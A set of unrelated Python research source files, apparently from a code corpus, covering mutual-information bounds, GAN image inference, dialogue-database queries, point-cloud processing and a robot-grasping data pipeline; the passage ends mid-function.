config.update({"preprocess_shift": train_dp.source.shift})
if hasattr(train_dp, "labels") and train_dp.labels is not None:
labels = train_dp.labels
label_shape = labels.shape
if len(label_shape) == 2:
config["num_classification_problems"] = label_shape[1]
num_classes_per_problem = np.array([len(np.unique(labels[:, i])) for i in range(label_shape[1])])
config["num_classes_per_problem"] = num_classes_per_problem
config["max_num_classes"] = np.max(num_classes_per_problem)
else:
config["num_classification_problems"] = 1
config["max_num_classes"] = len(np.unique(labels))
if config["dataset_name"] == "multiomniglot":
config["true_mutual_info"] = np.sum(np.log(num_classes_per_problem))
if only_val:
return val_dp
elif include_test:
return train_dp, val_dp, test_dp
else:
return train_dp, val_dp
def dv_bound_fn(e1, e2):
term1 = np.mean(e1)
term2 = -logsumexp(e2) + np.log(len(e2))
bound = term1 + term2
return bound, term1, term2
def nwj_bound_fn(e1, e2):
term1 = np.mean(e1) + 1
term2 = - np.mean(np.exp(e2))
bound = term1 + term2
return bound, term1, term2
def log_sigmoid(x):
return np.minimum(x, 0) - np.log(1 + np.exp(-np.abs(x)))
def np_nce_loss(neg_energy1, neg_energy2, nu=1):
log_nu = np.log(nu)
term1 = log_sigmoid(neg_energy1 - log_nu) # (n, n_ratios)
term2 = log_sigmoid(log_nu - neg_energy2) # (n, n_ratios)
loss_term1 = -np.mean(term1, axis=0)
loss_term2 = -nu * np.mean(term2, axis=0)
loss = loss_term1 + loss_term2 # (n_ratios, )
return loss, loss_term1, loss_term2
def jensen_shannon_fn(e1, e2, logz):
m1 = np.stack([e1, np.ones_like(e1)*logz], axis=1)
m2 = np.stack([e2, np.ones_like(e2)*logz], axis=1)
term1 = np.log(2) + np.mean(e1) - np.mean(logsumexp(m1, axis=1))
term2 = np.log(2) + logz - np.mean(logsumexp(m2, axis=1))
return 0.5 * (term1 + term2)
def plot_chains_main(chains, name, save_dir, dp, config, vminmax = (0, 1), max_n_states=10):
if (config.dataset_name in IMG_DATASETS) or ("pca" in config.dataset_name):
max_n_chains = 10000
skip_n = max(1, int(len(chains) / max_n_chains))
x = revert_data_preprocessing(chains[::skip_n], dp, is_wmark_input=True)
layout_dim = 7
n_pages = int(np.ceil(len(x) / layout_dim ** 2))
disp_imdata(imgs=x[:, -1, ...],
dataset_name=config.dataset_name,
dir_name=os.path.join(save_dir, "{}_final_states/".format(name)),
layout=[layout_dim, layout_dim],
num_pages=n_pages,
vminmax=vminmax
)
if chains.shape[1] > 1:
# plot all states for individual chains
n_chains_to_plot = min(50, len(x))
n_chains_in_figure = 10
n_figures = int(np.ceil(n_chains_to_plot / n_chains_in_figure))
n_skip = int(np.ceil(x.shape[1] / min(max_n_states, x.shape[1])))
n_states_in_figure = int(np.ceil(x.shape[1] / n_skip))
chains_event_dims = x.shape[2:]
for i in range(n_figures):
disp_imdata(imgs=x[n_chains_in_figure * i:n_chains_in_figure * (i + 1), ::n_skip].reshape(-1, *chains_event_dims),
dataset_name=config.dataset_name,
dir_name=os.path.join(save_dir, "{}_whole_chains/".format(name)),
# layout=[int(np.ceil(len(chains[i]) ** 0.5))] * 2,
layout=[n_chains_in_figure, n_states_in_figure],
name=str(i),
vminmax=vminmax
)
def revert_data_preprocessing(data, dp, is_wmark_input):
if is_wmark_input:
n, k, event_dims = data.shape[0], data.shape[1], data.shape[2:]
data = data.reshape((-1, *event_dims)) # (n*k, ...)
data = dp.source.reverse_preprocessing(data)
if is_wmark_input:
event_dims = data.shape[1:]
data = data.reshape(n, k, *event_dims) # (n, k, ...)
return data
def logit_inv(x, alpha):
return (sigmoid(x) - alpha)/(1 - 2 * alpha)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
|
411804
|
import os
import torch
from torchvision.utils import save_image
from config import *
from selfie2anime import get_selfie2anime_loader
from models import Generator
from utils import denorm, make_dirs, make_gifs_test
# Device Configuration #
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def inference():
# Inference Path #
make_dirs(config.inference_path)
# Prepare Data Loader #
test_loader_selfie, test_loader_anime = get_selfie2anime_loader('test', config.batch_size)
# Prepare Generator #
G_A2B = Generator(image_size=config.crop_size, num_blocks=config.num_blocks).to(device)
G_A2B.load_state_dict(torch.load(os.path.join(config.weights_path, 'U-GAT-IT_G_A2B_Epoch_{}.pkl'.format(config.num_epochs))))
# Inference #
print("U-GAT-IT | Generating Selfie2Anime images started...")
with torch.no_grad():
for i, (selfie, anime) in enumerate(zip(test_loader_selfie, test_loader_anime)):
# Prepare Data #
real_A = selfie.to(device)
# Generate Fake Images #
fake_B = G_A2B(real_A)[0]
# Save Images (Selfie -> Anime) #
result = torch.cat((real_A, fake_B), dim=0)
save_image(denorm(result.data),
os.path.join(config.inference_path, 'U-GAT-IT_Selfie2Anime_Results_%03d.png' % (i + 1))
)
# Make a GIF file #
make_gifs_test("U-GAT-IT", "Selfie2Anime", config.inference_path)
if __name__ == '__main__':
inference()
|
411877
|
import json
import os
import random
import zipfile
from convlab2.util.file_util import cached_path
def auto_download():
model_path = os.path.join(os.path.dirname(__file__), os.pardir, 'model')
data_path = os.path.join(os.path.dirname(__file__), os.pardir, 'data')
db_path = os.path.join(os.path.dirname(__file__), os.pardir, 'db')
root_path = os.path.join(os.path.dirname(__file__), os.pardir)
urls = {model_path: 'https://convlab.blob.core.windows.net/convlab-2/mdrg_model.zip',
data_path: 'https://convlab.blob.core.windows.net/convlab-2/mdrg_data.zip',
db_path: 'https://convlab.blob.core.windows.net/convlab-2/mdrg_db.zip'}
for path in [model_path, data_path, db_path]:
if not os.path.exists(path):
file_url = urls[path]
print('Downloading from: ', file_url)
archive_file = cached_path(file_url)
print('Extracting...')
archive = zipfile.ZipFile(archive_file, 'r')
archive.extractall(root_path)
# loading databases
domains = ['restaurant', 'hotel', 'attraction', 'train', 'hospital', 'taxi', 'police']
dbs = {}
auto_download()
for domain in domains:
dbs[domain] = json.load(open(os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'db/{}_db.json'.format(domain))))
def query(domain, constraints, ignore_open=True):
"""Returns the list of entities for a given domain
based on the annotation of the belief state"""
# query the db
if domain == 'taxi':
return [{'taxi_colors': random.choice(dbs[domain]['taxi_colors']),
'taxi_types': random.choice(dbs[domain]['taxi_types']),
'taxi_phone': [random.randint(1, 9) for _ in range(10)]}]
if domain == 'police':
return dbs['police']
if domain == 'hospital':
return dbs['hospital']
found = []
for record in dbs[domain]:
for key, val in constraints:
if val == "" or val == "dont care" or val == 'not mentioned' or val == "don't care" or val == "dontcare" or val == "do n't care":
pass
else:
if key not in record:
continue
if key == 'leaveAt':
val1 = int(val.split(':')[0]) * 100 + int(val.split(':')[1])
val2 = int(record['leaveAt'].split(':')[0]) * 100 + int(record['leaveAt'].split(':')[1])
if val1 > val2:
break
elif key == 'arriveBy':
val1 = int(val.split(':')[0]) * 100 + int(val.split(':')[1])
val2 = int(record['arriveBy'].split(':')[0]) * 100 + int(record['arriveBy'].split(':')[1])
if val1 < val2:
break
# elif ignore_open and key in ['destination', 'departure', 'name']:
elif ignore_open and key in ['destination', 'departure']:
continue
else:
if val.strip() != record[key].strip():
break
else:
found.append(record)
return found
|
411929
|
import torch
import os
os.environ['TORCH_HOME'] = './'
import torch.nn as nn
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data.dataset import Dataset # For custom datasets
from torch.utils.data import DataLoader
from model import UNet, UNet_2
from dorn import DORN
from dataset import AffineDataset, AffineTestsDataset
import numpy as np
from tensorboardX import SummaryWriter
import argparse
import skimage.io as sio
import sys
import Render.render as render
import math
from time import time
train_dataset = AffineTestsDataset(feat=0,root='data')
sample_batched = train_dataset[35]
color = np.ascontiguousarray(np.transpose(sample_batched['image'][0:3,:,:], (1, 2, 0)).astype('float32'))
labels = np.transpose(sample_batched['label'].numpy(), (1, 2, 0))
Qx = np.ascontiguousarray(labels[:,:,0:2].astype('float32'))
Qy = np.ascontiguousarray(labels[:,:,2:4].astype('float32'))
sio.imsave('color.png', color)
render.visualizeDirection('vis.png', color, Qx, Qy)
|
411970
|
import torch
import torch.nn as nn
from torch import optim
from sampler import PKSampler, PKSampler2
def get_Sampler(sampler,dataset,p=15,k=20):
if sampler == 'all':
return PKSampler2(dataset, p=p, k=k)
else:
return PKSampler(dataset, p=p, k=k)
def get_Optimizer(model, optimizer_type=None, lr=1e-3, weight_decay=1e-3):
if(optimizer_type=='sgd'):
return optim.SGD(model.parameters(), lr=lr, momentum=0.9, nesterov=True, weight_decay=weight_decay)
elif(optimizer_type=='rmsprop'):
return optim.RMSprop(model.parameters(), lr=lr, weight_decay=weight_decay)
elif(optimizer_type=='adadelta'):
return optim.Adadelta(model.parameters(), lr=lr, weight_decay=weight_decay)
else:
return optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)
def get_Scheduler(optimizer, lr, scheduler_name=None):
if(scheduler_name=='cyclic'):
return optim.lr_scheduler.CyclicLR(optimizer, base_lr=5e-4, max_lr=lr, step_size_up=500)
elif(scheduler_name=='cosine'):
return optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=1000)
elif(scheduler_name=='multistep'):
# return optim.lr_scheduler.MultiStepLR(optimizer, milestones=[3,13,30], gamma=0.3)
return optim.lr_scheduler.MultiStepLR(optimizer, milestones=[6,20,40], gamma=0.1)
else:
return optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.99)
|
411994
|
from __future__ import annotations
import datetime
import warnings
from pathlib import Path
from typing import List, Literal, Union
import numpy as np
import open3d
import pandas
import plotly
import plotly.express as px
import pyntcloud
from pointcloudset.diff import ALL_DIFFS
from pointcloudset.filter import ALL_FILTERS
from pointcloudset.io import (
POINTCLOUD_FROM_FILE,
POINTCLOUD_FROM_INSTANCE,
POINTCLOUD_TO_FILE,
POINTCLOUD_TO_INSTANCE,
)
from pointcloudset.plot.pointcloud import plot_overlay
from pointcloudset.pointcloud_core import PointCloudCore
from pointcloudset.config import PLOTLYSIZELIMIT
class PointCloud(PointCloudCore):
"""
PointCloud Class with one pointcloud of lidar measurements, laser scanning,
photogrammetry or simular.
One PointCloud consists mainly of `PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_
pointcloud
(`PyntCloud.points <https://pyntcloud.readthedocs.io/en/latest/points.html#points>`_)
and a pandas.DataFrame (.data) with all the associated data.
Note that the index of the points is not preserved when applying processing. This
is necessary since `PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_
does not allow to pass the index. Therefore, a new PointCloud object is generated at
each processing stage.
Developer notes:
* All operations have to act on both, pointcloud and data and keep the timestamp.
* All processing methods need to return another PointCloud.
Examples:
.. code-block:: python
testbag = Path().cwd().parent.joinpath("tests/testdata/test.bag")
testset = pointcloudset.Dataset(testbag,topic="/os1_cloud_node/points",
keep_zeros=False)
testpointcloud = testset[0]
"""
@classmethod
def from_file(cls, file_path: Path, **kwargs):
"""Extract data from file and construct a PointCloud with it. Uses
`PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_ as
backend.
Args:
file_path (pathlib.Path): Path of file to read.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: PointCloud with timestamp last modified.
Raises:
ValueError: If file format is not supported.
TypeError: If file_path is no Path object.
"""
if not isinstance(file_path, Path):
raise TypeError("Expecting a Path object for file_path")
ext = file_path.suffix[1:].upper()
if ext not in POINTCLOUD_FROM_FILE:
raise ValueError(
"Unsupported file format; supported formats are: {}".format(
list(POINTCLOUD_FROM_FILE)
)
)
file_path_str = file_path.as_posix()
timestamp = datetime.datetime.utcfromtimestamp(file_path.stat().st_mtime)
pyntcloud_in = pyntcloud.PyntCloud.from_file(file_path_str, **kwargs)
return cls(
data=pyntcloud_in.points, orig_file=file_path_str, timestamp=timestamp
)
def to_file(self, file_path: Path = Path(), **kwargs) -> None:
"""Exports the pointcloud as to a file for use with `CloudCompare <https://www.danielgm.net/cc/ake>`_ or similar tools.
Currently not all attributes of a pointcloud are saved so some information is lost
when using this function.
Uses `PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_ as
backend.
Args:
file_path (pathlib.Path, optional): Destination. Defaults to the folder of
the bag file and csv with the timestamp of the pointcloud.
**kwargs: Keyword arguments to pass to func.
Raises:
ValueError: If file format is not supported.
"""
ext = file_path.suffix[1:].upper()
if ext not in POINTCLOUD_TO_FILE:
raise ValueError(
"Unsupported file format; supported formats are: {}".format(
list(POINTCLOUD_TO_FILE)
)
)
orig_file_name = Path(self.orig_file).stem
if file_path == Path():
# defaulting to csv file
filename = f"{orig_file_name}_timestamp_{self.timestamp}.csv"
destination_folder = Path(self.orig_file).parent.joinpath(filename)
else:
destination_folder = file_path
kwargs["file_path"] = destination_folder
kwargs["pointcloud"] = self
POINTCLOUD_TO_FILE[ext](**kwargs)
@classmethod
def from_instance(
cls,
library: Literal["PYNTCLOUD", "OPEN3D", "DATAFRAME", "PANDAS"],
instance: Union[
pandas.DataFrame, pyntcloud.PyntCloud, open3d.geometry.PointCloud
],
**kwargs,
) -> PointCloud:
"""Converts a library instance to a pointcloudset PointCloud.
Args:
library (str): Name of the library.\n
If PYNTCLOUD: :func:`pointcloudset.io.pointcloud.pyntcloud.from_pyntcloud`\n
If OPEN3D: :func:`pointcloudset.io.pointcloud.open3d.from_open3d`\n
If DATAFRAME: :func:`pointcloudset.io.pointcloud.pandas.from_dataframe`\n
If PANDAS: :func:`pointcloudset.io.pointcloud.pandas.from_dataframe`
instance
(Union[pandas.DataFrame, pyntcloud.PyntCloud, open3d.geometry.PointCloud]):
Library instance to convert.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: Derived from the instance.
Raises:
ValueError: If instance is not supported.
Examples:
.. code-block:: python
testpointcloud = from_instance("OPEN3D", open3d_pointcloud)
"""
library = library.upper()
if library not in POINTCLOUD_FROM_INSTANCE:
raise ValueError(
"Unsupported library; supported libraries are: {}".format(
list(POINTCLOUD_FROM_INSTANCE)
)
)
else:
return cls(**POINTCLOUD_FROM_INSTANCE[library](instance, **kwargs))
def to_instance(
self, library: Literal["PYNTCLOUD", "OPEN3D", "DATAFRAME", "PANDAS"], **kwargs
) -> Union[
pyntcloud.PyntCloud,
open3d.geometry.PointCloud,
pandas.DataFrame,
pandas.DataFrame,
]:
"""Convert PointCloud to another library instance.
Args:
library (str): Name of the library.\n
If PYNTCLOUD: :func:`pointcloudset.io.pointcloud.pyntcloud.to_pyntcloud`\n
If OPEN3D: :func:`pointcloudset.io.pointcloud.open3d.to_open3d`\n
If DATAFRAME: :func:`pointcloudset.io.pointcloud.pandas.to_dataframe`\n
If PANDAS: :func:`pointcloudset.io.pointcloud.pandas.to_dataframe`
**kwargs: Keyword arguments to pass to func.
Returns:
Union[ pandas.DataFrame, pyntcloud.PyntCloud, open3d.geometry.PointCloud ]:
The derived instance.
Raises:
ValueError: If library is not suppored.
Examples:
.. code-block:: python
open3d_pointcloud = testpointcloud.to_instance("OPEN3D")
"""
library = library.upper()
if library not in POINTCLOUD_TO_INSTANCE:
raise ValueError(
"Unsupported library; supported libraries are: {}".format(
list(POINTCLOUD_TO_INSTANCE)
)
)
return POINTCLOUD_TO_INSTANCE[library](self, **kwargs)
def plot(
self,
color: Union[None, str] = None,
overlay: dict = {},
point_size: float = 2,
prepend_id: str = "",
hover_data: Union(List[str], bool) = None,
**kwargs,
) -> plotly.graph_objs.Figure:
"""Plot a PointCloud as a 3D scatter plot with `Plotly <https://plotly.com/>`_.
It handles plots of single pointclouds and overlay with other objects, such as
other pointclouds from clustering or planes from plane segmentation.
You can also pass arguments to the `Plotly <https://plotly.com/>`_
express function :func:`plotly.express.scatter_3d`.
Args:
pointcloud (PointCloud): The pointcloud to plot.
color (str or None): Which column to plot. For example "intensity".
Defaults to None.
overlay (dict, optional): Dict with PointClouds to overlay.
{"Cluster 1": cluster1,"Plane 1": plane_model}\n
See also: :func:`pointcloudset.plot.pointcloud.plot_overlay`\n
Defaults to empty.
point_size (float, optional): Size of each point. Defaults to 2.
prepend_id (str, optional): String before point id to display in hover.
Defaults to empty.
hover_data (list(str) or True, optional): Data columns to display in hover. If True
then all the columns are are show in the hover.
Defaults to None.
**kwargs: Keyword arguments to pass to func.
Returns:
plotly.graph_objs.Figure: The interactive Plotly plot, best used inside a
Jupyter Notebook.
Raises:
ValueError: If the color column name is not in the data.
"""
if color is not None and color not in self.data.columns:
raise ValueError(f"choose any of {list(self.data.columns)} or None")
if len(self) > PLOTLYSIZELIMIT:
warnings.warn(
f"""Pointcloud above limit of {PLOTLYSIZELIMIT}.
Plotting might fail or take a long time.
Consider donwsampling before plotting.
for example: pointcloud.random_down_sample(10000).plot()"""
)
ids = [prepend_id + "id=" + str(i) for i in range(self.data.shape[0])]
show_hover = True
if hover_data is None:
show_hover = False
elif hover_data:
hover_data = list(self.data.columns)
elif isinstance(hover_data, list) & len(hover_data) > 0:
if self.has_original_id:
default = ["original_id"]
hover_data = hover_data + default
hover_data = list(set(hover_data))
if any(x not in self.data.columns for x in hover_data):
raise ValueError(f"choose a list of {list(self.data.columns)} or []")
fig = px.scatter_3d(
self.data,
x="x",
y="y",
z="z",
color=color,
hover_name=ids,
hover_data=hover_data,
title=self.timestamp_str,
**kwargs,
)
if overlay:
fig = plot_overlay(
fig,
self,
overlay,
hover_data=hover_data,
**kwargs,
)
fig.update_layout(scene_aspectmode="data")
if not show_hover:
fig.update_layout(hovermode=False)
fig.update_traces(
marker=dict(size=point_size, line=dict(width=0)),
selector=dict(mode="markers"),
)
return fig
def diff(
self,
name: Literal["origin", "plane", "pointcloud", "point"],
target: Union[None, PointCloud, np.ndarray] = None,
**kwargs,
) -> PointCloud:
"""Calculate differences and distances to the origin, plane, point and pointcloud.
Args:
name (str):
"origin": :func:`pointcloudset.diff.origin.calculate_distance_to_origin` \n
"plane": :func:`pointcloudset.diff.plane.calculate_distance_to_plane` \n
"pointcloud": :func:`pointcloudset.diff.pointcloud.calculate_distance_to_pointcloud` \n
"point": :func:`pointcloudset.diff.point.calculate_distance_to_point` \n
target (Union[None, PointCloud, numpy.ndarray], optional): Pass argument
according to chosen object. Defaults to None.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: New PointCloud with added column of the differences.
Raises:
ValueError: If name is not supported.
Examples:
.. code-block:: python
newpointcloud = testpointcloud.diff("pointcloud", targetpointcloud)
"""
if name in ALL_DIFFS:
ALL_DIFFS[name](pointcloud=self, target=target, **kwargs)
return self
else:
raise ValueError("Unsupported diff. Check docstring")
def filter(
self, name: Literal["quantile", "value", "radiusoutlier"], *args, **kwargs
) -> PointCloud:
"""Filters a PointCloud according to criteria.
Args:
name (str):
"quantile": :func:`pointcloudset.filter.stat.quantile_filter` \n
"value": :func:`pointcloudset.filter.stat.value_filter` \n
"radiusoutlier": :func:`pointcloudset.filter.stat.remove_radius_outlier` \n
*args: Positional arguments to pass to func.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: PointCloud which fullfils the criteria.
Raises:
ValueError: If name is not supported.
Examples:
.. code-block:: python
filteredpointcloud = testpointcloud.filter("quantile","intensity","==",0.5)
.. code-block:: python
filteredpointcloud = testpointcloud.filter("value","intensity",">",100)
"""
name = name.upper()
if name in ALL_FILTERS:
return ALL_FILTERS[name](self, *args, **kwargs)
else:
raise ValueError("Unsupported filter. Check docstring")
def limit(self, dim: "str", minvalue: float, maxvalue: float) -> PointCloud:
"""Limit the range of certain values in pointcloudset PointCloud. Can be chained together.
Args:
dim (str): Dimension to limit, any column in data not just x, y, or z.
minvalue (float): Min value to limit. (greater equal)
maxvalue (float): Max value to limit. (smaller equal)
Returns:
PointCloud: Limited pointcloud, where columns which did not match the criteria were
dropped.
Examples:
.. code-block:: python
limitedpointcloud = testpointcloud.limit("x", -1.0, 1.0).limit("intensity", 0.0, 50.0)
"""
if maxvalue < minvalue:
raise ValueError("maxvalue must be greater than minvalue")
return self.filter("value", dim, ">=", minvalue).filter(
"value", dim, "<=", maxvalue
)
def apply_filter(self, filter_result: Union[np.ndarray, List[int]]) -> PointCloud:
"""Generating a new PointCloud by removing points according to a call of the
filter method.
Args:
filter_result (Union[numpy.ndarray, List[int]]): Filter result.
Returns:
PointCloud: PointCloud with filtered rows and reindexed data and points.
Raises:
TypeError: If the filter_result has the wrong type.
"""
if isinstance(filter_result, np.ndarray):
# dataframe and pyntcloud based filters
new_data = self.data.loc[filter_result].reset_index(drop=True)
elif isinstance(filter_result, list):
# from open3d filters
new_data = self.data.iloc[filter_result].reset_index(drop=True)
else:
raise TypeError(
(
"Wrong filter_result expecting array with boolean values or"
"list of indices"
)
)
return PointCloud(new_data, timestamp=self.timestamp)
def get_cluster(self, eps: float, min_points: int) -> pandas.DataFrame:
"""Get the clusters based on
:meth:`open3d:open3d.geometry.PointCloud.cluster_dbscan`.
Process further with :func:`pointcloudset.pointcloud.PointCloud.take_cluster`.
Args:
eps (float): Density parameter that is used to find neighboring points.
min_points (int): Minimum number of points to form a cluster.
Returns:
pandas.DataFrame: Dataframe with list of clusters.
"""
labels = np.array(
self.to_instance("open3d").cluster_dbscan(
eps=eps, min_points=min_points, print_progress=False
)
)
return pandas.DataFrame(labels, columns=["cluster"])
def take_cluster(
self, cluster_number: int, cluster_labels: pandas.DataFrame
) -> PointCloud:
"""Takes only the points belonging to the cluster_number.
Args:
cluster_number (int): Cluster ID to keep.
cluster_labels (pandas.DataFrame): Clusters generated with
:func:`pointcloudset.pointcloud.PointCloud.get_cluster`.
Returns:
PointCloud: PointCloud with selected cluster.
"""
bool_array = (cluster_labels["cluster"] == cluster_number).values
return self.apply_filter(bool_array)
def plane_segmentation(
self,
distance_threshold: float,
ransac_n: int,
num_iterations: int,
return_plane_model: bool = False,
) -> Union[PointCloud, dict]:
"""Segments a plane in the point cloud using the RANSAC algorithm.
Based on :meth:`open3d:open3d.geometry.PointCloud.segment_plane`.
Args:
distance_threshold (float): Max distance a point can be from the plane
model, and still be considered as an inlier.
ransac_n (int): Number of initial points to be considered inliers in
each iteration.
num_iterations (int): Number of iterations.
return_plane_model (bool, optional): Return also plane model parameters
if ``True``. Defaults to ``False``.
Returns:
PointCloud or dict: PointCloud with inliers or a dict of PointCloud with inliers and the
plane parameters.
"""
pcd = self.to_instance("open3d")
plane_model, inliers = pcd.segment_plane(
distance_threshold=distance_threshold,
ransac_n=ransac_n,
num_iterations=num_iterations,
)
if len(self) > 200:
warnings.warn(
"""Might not produce reproduceable resuts, if the number of points
is high. Try to reduce the area of interest before using
plane_segmentation. Caused by open3D."""
)
inlier_pointcloud = self.apply_filter(inliers)
if return_plane_model:
return {"PointCloud": inlier_pointcloud, "plane_model": plane_model}
else:
return inlier_pointcloud
def random_down_sample(self, number_of_points: int) -> PointCloud:
"""Function to downsample input pointcloud into output pointcloud randomly.
Made
Args:
number_of_points ([int]): number_of_points
Returns:
PointCloud: subsampled PointCloud
"""
new_data = self.data.sample(number_of_points).reset_index()
return PointCloud(new_data, timestamp=self.timestamp)
|
412008
|
import asyncio
import uvloop
def get_new_uvloop_queue():
loop = uvloop.new_event_loop()
return asyncio.Queue(loop=loop)
new_messages = get_new_uvloop_queue()
users_changed = get_new_uvloop_queue()
online = get_new_uvloop_queue()
offline = get_new_uvloop_queue()
check_online = get_new_uvloop_queue()
is_typing = get_new_uvloop_queue()
read_unread = get_new_uvloop_queue()
|
412017
|
import numpy as np, tensorflow as tf, aolib.util as ut, aolib.img as ig, os, sys, sklearn.svm, press, copy, sklearn.pipeline
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets as nets
import vgg, h5py
import sklearn.metrics
pj = ut.pjoin
full_dim = 256
crop_dim = 224
#gpu = '/gpu:0'
init_path = '../results/vgg_16.ckpt'
label_path = '../data/grasp'
checkpoint_iters = 1000
ed = tf.expand_dims
im_names = 'gel0_pre gel1_pre gel0_post gel1_post im0_pre im0_post depth0_pre depth0_post'.split()
write_data_gpu = 0
press_model_file = '../results/press-data-v11/training/net.tf-4600'
ee_dim = 4
def download_pretrained():
# https://github.com/tensorflow/models/tree/master/slim
ut.mkdir('../results')
ut.sys_check('wget http://download.tensorflow.org/models/vgg_16_2016_08_28.tar.gz '
' -O ../results/vgg_16_2016_08_28.tar.gz')
ut.sys_check('cd ../results; tar -xzf vgg_16_2016_08_28.tar.gz')
def moving_avg(name, x, vals = {}, avg_win_size = 100):
ut.add_dict_list(vals, name, x)
return np.mean(vals[name][-avg_win_size:])
def shape(x, d = None):
s = x.get_shape().as_list()
return s if d is None else s[d]
def name_from_file(db_file):
#return '_'.join(x.split('/')[-1].split('_')[2:])
with h5py.File(db_file, 'r') as db:
#print db.keys()
name = str(np.array(db['object_name'].value)[0])
name = remap_name(name)
#print db_file, '->', name
return name
def db_ok(db_file):
try:
with h5py.File(db_file, 'r') as db:
ks = db.keys()
reqs = ['GelSightA_image', 'GelSightB_image',
'is_gripping', 'angle_of_EE_at_grasping',
'location_of_EE_at_grasping', 'object_name',
'time_pre_grasping', 'time_post1_grasping',
'color_image_KinectA', 'depth_image_KinectA',
'timestamp']
for r in reqs:
if r not in ks:
print db_file, 'is missing', r
return False
return True
except:
return False
def crop_kinect(im):
# the bounds of the table, plus some padding above for tall objects
bounds = np.array([[ 0.28602991, 0.07516428],
[ 0.76788474, 0.06441159],
[ 0.97554603, 0.59487754],
[ 0.13482023, 0.60563023]])
d = np.array([im.shape[1], im.shape[0]])
x0, y0 = map(int, bounds.min(0) * d)
x1, y1 = map(int, bounds.max(0) * d)
return im[y0 : y1, x0 : x1]
def milestone_frames(db):
times = np.array(db['/timestamp'].value)
pre = np.argmin(np.abs(db['time_pre_grasping'].value - times))
mid = np.argmin(np.abs(db['time_at_grasping'].value - times))
post = np.argmin(np.abs(db['time_post1_grasping'].value - times))
return pre, mid, post
def remap_name(name):
remap = {'plastic_duc': 'plastic_duck',
'hair_dryer_': 'hair_dryer_spiky_nozzle',
'light_blue_': 'light_blue_translucent_object',
'brown_paper': 'brown_paper_bag',
'beans_in_pa': 'beans_in_paper_container',
'shampoo_whi': 'shampoo_white_bottle',
'small_blue_': 'small_blue_plastic_spoon',
'dove_deodor': 'dove_deodorant',
'yellow_bulb': 'yellow_bulb_man',
'toy_person_with_hat': 'set_small_plastic_men_yellow_construction_worker'}
return remap.get(name, name)
#def write_data(out_dir, train_frac = 0.75, val_frac = 0.05):
#def write_data(out_dir, rebalance_data = False, train_frac = 0.75, val_frac = 0.0, n = None):
def write_data(out_dir, rebalance_data = True, train_frac = 0.75, val_frac = 0.0, n = None):
#def write_data(out_dir, rebalance_data = True, train_frac = 0.75, val_frac = 0.0, n = 10):
assert not os.path.exists(out_dir)
ut.mkdir(out_dir)
base_data = '../data/grasp/'
ut.sys_check('find -L %s -name "*.hdf5" > %s/all_db_files.txt' % (base_data, out_dir))
all_db_files = ut.read_lines(pj(out_dir, 'all_db_files.txt'))[:n]
all_db_files = ut.shuffled_with_seed(all_db_files)
all_db_files = filter(db_ok, all_db_files)
ut.write_lines(pj(out_dir, 'db_files.txt'), all_db_files)
by_name = ut.accum_dict((name_from_file(x), x) for x in all_db_files)
names = ut.shuffled_with_seed(sorted(by_name.keys()))
num_names = len(names)
num_train = int(train_frac * num_names)
num_val = int(val_frac * num_names)
i = 0
train_names = names[i : num_train]
i += num_train
val_names = names[i : i + num_val]
i += num_val
test_names = names[i:]
print num_train, num_val, len(test_names)
splits = [('train', train_names),
('val', val_names),
('test', test_names)]
print 'Number of objects in each split:'
for s, o in splits:
print s, '->', len(o)
#press_clf = press.NetClf(press_model_file, gpu = write_data_gpu)
press_clf = None#press.NetClf(press_model_file, gpu = write_data_gpu)
for dset_name, names in splits:
ut.write_lines(pj(out_dir, '%s_objects.txt' % dset_name), names)
tf_file = pj(out_dir, '%s.tf' % dset_name)
pk_file = pj(out_dir, '%s.pk' % dset_name)
full_pk_file = pj(out_dir, 'full_%s.pk' % dset_name)
if os.path.exists(tf_file):
os.remove(tf_file)
writer = tf.python_io.TFRecordWriter(tf_file)
split_db_files = ut.flatten(by_name[name] for name in names)
split_db_files = ut.shuffled_with_seed(split_db_files, dset_name)
data = []
for db_file in ut.time_est(split_db_files):
with h5py.File(db_file, 'r') as db:
#print 'keys =', db.keys()
def im(x, crop = False, compress = True):
x = ig.uncompress(x)
x = np.array(x)
if crop:
x = crop_kinect(x)
#ig.show(x)
x = ig.scale(x, (256, 256), 1)
if compress:
x = ig.compress(x)
return x
def depth(x):
x = np.array(x).astype('float32')
x = ig.scale(x, (256, 256), 1)
return x
def parse_ee(x):
names = ['angle_of_EE_at_grasping', 'location_of_EE_at_grasping']
vs = [x[name].value for name in names]
ee = np.concatenate([np.array(v).flatten() for v in vs]).astype('float32')
return ee
label_file = pj(label_path, db_file.split('/')[-1].replace('.hdf5', '.txt'))
if os.path.exists(label_file):
print 'Reading label from file'
is_gripping = bool(ut.read_file(label_file))
else:
is_gripping = int(np.array(db['is_gripping']))
pre, mid, _ = milestone_frames(db)
# Estimate the probability that the robot is initially gripping the object
if 0:
press_a = press_clf.predict(
im(db['/GelSightA_image'].value[mid], compress = False),
im(db['/GelSightA_image'].value[pre], compress = False))
press_b = press_clf.predict(
im(db['/GelSightB_image'].value[mid], compress = False),
im(db['/GelSightB_image'].value[pre], compress = False))
initial_press_prob = 0.5 * (press_a + press_b)
else:
initial_press_prob = np.float32(-1.)
#print initial_press_prob, ig.show(im(db['/GelSightA_image'].value[mid], compress = False))
d = dict(gel0_pre = im(db['/GelSightA_image'].value[pre]),
gel1_pre = im(db['/GelSightB_image'].value[pre]),
gel0_post = im(db['/GelSightA_image'].value[mid]),
gel1_post = im(db['/GelSightB_image'].value[mid]),
im0_pre = im(db['/color_image_KinectA'].value[pre], crop = True),
im0_post = im(db['/color_image_KinectA'].value[mid], crop = True),
im1_pre = im(db['/color_image_KinectB'].value[pre], crop = True),
